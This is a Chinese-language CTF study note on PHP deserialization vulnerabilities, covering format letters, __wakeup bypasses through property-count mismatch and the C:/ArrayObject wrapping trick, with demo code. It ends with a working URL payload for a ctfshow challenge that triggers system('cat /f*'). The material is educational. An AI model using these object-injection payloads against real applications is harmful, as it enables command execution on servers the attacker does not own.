01什么是序列化和反序列化
序列化是将对象转化为字符串以便存储的一种方式。而反序列化恰好是序列化的逆过程,反序列化会将字符串转化为对象供程序使用。
常见的php系列化和反系列化方式主要有:serialize,unserialize;json_encode,json_decode。
02什么是反序列化漏洞
当程序在进行反序列化时,会自动调用一些函数,例如wakeup(),destruct()等函数,但是如果传入函数的参数可以被用户控制的话,用户可以输入一些恶意代码到函数中,从而导致反序列化漏洞。
03序列化格式中的字母含义:
a - array
b - boolean
d - double
i - integer
o - common object
r - reference
s - string
C - custom object
O - class
N - null
R - pointer reference
U - unicode string
04魔术方法
例题1(几乎不会涉及较复杂绕过):[SWPUCTF 2021 新生赛]ez_unserialize
__wakeup()方法漏洞
漏洞影响版本:PHP5 < 5.6.25 PHP7 < 7.0.10
影响原因:若在对象的魔法函数中存在_wakeup方法,那么之后在调用unserilize()方法进行反序列化之前则会先调用 _wakeup方法
属性个数不匹配
利用方法:当序列化字符串中表示对象属性个数值大于真是属性个数时会跳出wakeup执行
方法原理:反序列化是一个正向检索的函数,虽然对于整体来说,数量不符,无法完成反序列化,但是可以尽可能检索能够完成反序列化的目标,所以这里数量改多了,会先依次反序列化已有个单位,直到无法检索到下一个目标才判定反序列化失败。 所以当然可以触发__destruct(),完成前面属性的赋值。
eg:[SWPUCTF 2021 新生赛]no_wakeup
unserialize3 反序列字符串绕过
C绕过wakeup
O标识符代表对象类型,而C标识符代表类名类型。如果将O替换为C,则在反序列化时会将其解释为一个新的类名字符串,从而创建一个新的类而不是对象。因为这个新的类没有被序列化过,所以它没有任何属性或方法。这样一来,在反序列化时,__wakeup魔术方法就不会
被自动调用。
跟着大佬走一遍(这部分几乎完全跟着大佬博客走着学了一遍):
引入
//引入
<?php
class AAA {
public function __wakeup() {
echo "__wakeup";
}
public function __construct(){
echo "__construct".PHP_EOL;//换行符
}
public function __destruct(){
echo "__destruct".PHP_EOL;
}
}
$a = serialize(new AAA());
$mod = str_replace("O:","C:",$a);//这里是将O:替换成c:为了绕过题目中不允许的地方
echo $mod.PHP_EOL;
$unserialized = unserialize($mod);
var_dump($unserialized);
?>
//回显
__construct
__destruct
C:3:"AAA":0:{}
Warning: Class AAA has no unserializer in E:\workspace2024\learn_php\test02.php on line 21
object(AAA)#1 (0) { } __destruct
O被替换成了C以后,生成的序列化字符串被认为可调用
扩展
C这个标识符,其实也是代表实现了 Serializable接口的类,因为实现Serializable接口,我们必须要重写serialize和unserialize方法
<?php
//定义的AAAA的类可以实现Serializable接口,意味着该实例可以被序列化和反序列化
class AAAA implements Serializable{
public $name="aa";
public $age="bb";
public function serialize() {//
return serialize(array(
'name' => $this->name,//这是一个键值对。键是字符串 'name',值是从当前对象的 $name 属性中取得的。$this 是PHP中的一个特殊变量,它引用当前对象。
'age' => $this->age
));
}
public function unserialize($data) {
$data = unserialize($data);
$this->name = $data['name'];//从反序列化后的数组$data中提取'name'键的值,并将其赋值给当前对象的$name属性。
$this->age = $data['age'];
}
public function __construct(){
echo "__construct\n";
}
public function __wakeup() {
echo "__wakeup()";
}
public function __destruct(){
echo 2222222;
}
}
$a = new AAAA();
$b = serialize($a);
echo $b.PHP_EOL;
$c = unserialize($b);
var_dump($c);
//回显
Deprecated: AAAA implements the Serializable interface, which is deprecated. Implement __serialize() and __unserialize() instead (or in addition, if support for old PHP versions is necessary) in E:\workspace2024\learn_php\test02.php on line 2
__construct C:4:"AAAA":45:{a:2:{s:4:"name";s:2:"aa";s:3:"age";s:2:"bb";}} object(AAAA)#2 (2) { ["name"]=> string(2) "aa" ["age"]=> string(2) "bb" } 22222222222222
利用
<?php
// 获取所有已定义的类
$classes = get_declared_classes();
$serializableClasses = [];
// 遍历所有类
foreach ($classes as $class) {
// 创建反射类对象
$reflection = new ReflectionClass($class);
// 判断类是否实现了 Serializable 接口
if ($reflection->implementsInterface('Serializable')) {
// 将实现了 Serializable 接口的类添加到数组中
$serializableClasses[] = $class;
}
}
// 输出实现了 Serializable 接口的所有原生类
foreach ($serializableClasses as $class) {
echo $class . PHP_EOL;
}
?>
这里使用第一个,先生成一个,放到反序列化看看
<?php
class AAAA{
public $name=1;
public $age=2;
}
$a = new ArrayObject;
$a -> a = new AAAA;
echo serialize($a);
//C:11:"ArrayObject":73:{x:i:0;a:0:{};m:a:1:{s:1:"a";O:4:"AAAA":2:{s:4:"name";i:1;s:3:"age";i:2;}}}
<?php
class AAAA{
public $name="aa";
public $age="bb";
public function __wakeup() {
echo "__wakeup\n";
}
public function __construct(){
echo "__construct\n";
}
public function __destruct(){
echo 2222222;
}
}
$c = unserialize('C:11:"ArrayObject":73:{x:i:0;a:0:{};m:a:1:{s:1:"a";O:4:"AAAA":2:{s:4:"name";i:1;s:3:"age";i:2;}}}');
var_dump($c);
?>
最后发现并没有绕过wakeup,但是也可以当作一种绕过。emmm
eg:ctfshow愚人杯 easy_php
ctfshow愚人杯 easy_php
<?php
error_reporting(0);
highlight_file(__FILE__);
class ctfshow{
public function __wakeup(){
die("not allowed!");
}
public function __destruct(){
system($this->ctfshow);
}
}
$data = $_GET['1+1>2'];
if(!preg_match("/^[Oa]:[\d]+/i", $data)){
//说明不可以使用O:,或者a:开头
unserialize($data);
}
?>
wp:
<?php
class ctfshow{
public $ctfshow="cat /f*";//列出所有以f开头的文件
}
$A=new ArrayObject;//ArrayObject 是 PHP 的一个类,用于实现数组作为对象的接口。
$A->a=new ctfshow;
echo serialize($A);//输出代表 $A 对象的状态。这个字符串包含了 $A 对象及其属性 a(该属性是一个 ctfshow 对象)的信息。
?>
不知道为什么自己的一直没有实现,最后经大佬指点发现是php编译器问题最后换了一个方式找到答案。
C:11:"ArrayObject":75:{x:i:0;a:0:{};m:a:1:{s:1:"a";O:7:"ctfshow":1:{s:7:"ctfshow";s:7:"cat /f*";}}}
payload:
?1%2B1%3E2=C:11:"ArrayObject":75:{x:i:0;a:0:{};m:a:1:{s:1:"a";O:7:"ctfshow":1:{s:7:"ctfshow";s:7:"cat /f*";}}}
参考:反序列化漏洞详解-CSDN博客v99pc_search_result_base8&utm_term=%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96&spm=1018.2226.3001.4187
PHP序列化和反序列化-CSDN博客v99pc_search_result_base8&spm=1018.2226.3001.4187
